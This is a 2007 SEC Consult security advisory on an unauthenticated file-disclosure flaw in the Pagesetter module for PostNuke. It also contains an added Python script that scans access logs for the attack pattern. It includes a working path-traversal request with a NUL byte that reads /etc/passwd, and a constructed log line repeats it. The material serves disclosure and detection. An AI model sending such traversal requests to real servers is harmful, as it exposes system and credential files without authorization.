title: File Disclosure in Pagesetter for PostNuke
program: Pagesetter page creation module
vulnerable version: 6.2.0, 6.3.0 beta 5
impact: high
homepage: http://www.elfisk.dk
found: 2006-11-21
by: D. Matscheko / SEC-CONSULT /
Pagesetter is a publishing module that allows the PostNuke users to create web pages from structured data, with the data structure and output templates defined by the PostNuke administrator.
The third-party Pagesetter module for PostNuke, up to and including its latest version (6.3.0 beta 5), allows an attacker to read arbitrary files. The attacker does not need to be logged in but has to know the filename.
Here is a sample request that reads the file '/etc/passwd':
$ GET 'http://example.com/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00'
Versions 6.2.0 and 6.3.0 beta 5 are vulnerable to the described attack. No older versions were tested.
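A log check for the request pattern shown above, as an added example that is not part of the original advisory or the vendor's code: it flags Pagesetter `func=preview` requests whose `id` parameter carries path-traversal or NUL-byte content. The log lines are constructed, and the rule that a legitimate `id` never contains `..`, a path separator or a NUL byte is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Feb/2007:10:01:02 +0000] "GET /index.php?module=Pagesetter'
    '&type=file&func=preview&id=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1432',
    '203.0.113.4 - - [26/Feb/2007:10:03:00 +0000] "GET /index.php?module=Pagesetter'
    '&type=file&func=preview&id=1234 HTTP/1.1" 200 20480',
    '203.0.113.4 - - [26/Feb/2007:10:03:05 +0000] "GET /index.php?module=News'
    '&id=../x HTTP/1.1" 404 0',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_id(value):
    """Return the reasons a decoded id value looks like a file path."""
    reasons = []
    if "\x00" in value:            # %00 in the URL decodes to a NUL byte
        reasons.append("nul-byte")
    if ".." in value:
        reasons.append("dot-dot")
    if "/" in value or "\\" in value:
        reasons.append("path-separator")
    return reasons


def scan(lines):
    """Return (client_ip, decoded_id, reasons) for flagged Pagesetter preview requests."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes each value once, as the web server would.
        query = parse_qs(urlsplit(match.group("target")).query)
        # Scope: the same module/type/func parameters as the advisory's sample request.
        if [v.lower() for v in query.get("module", [])] != ["pagesetter"]:
            continue
        if query.get("type") != ["file"] or query.get("func") != ["preview"]:
            continue
        for value in query.get("id", []):
            reasons = suspicious_id(value)
            if reasons:
                findings.append((line.split()[0], value, reasons))
    return findings


if __name__ == "__main__":
    for ip, value, reasons in scan(SAMPLE_LOG):
        print(ip, repr(value), ",".join(reasons))
```

A hit with a 200 status and a response size that differs from normal previews is worth correlating with the file named in the decoded `id`.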
vendor notified: 2007-02-08
vendor response: 2007-02-08
patch available: 2007-02-08
coordinated disclosure: 2007-02-26
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
EOF David Matscheko / @2007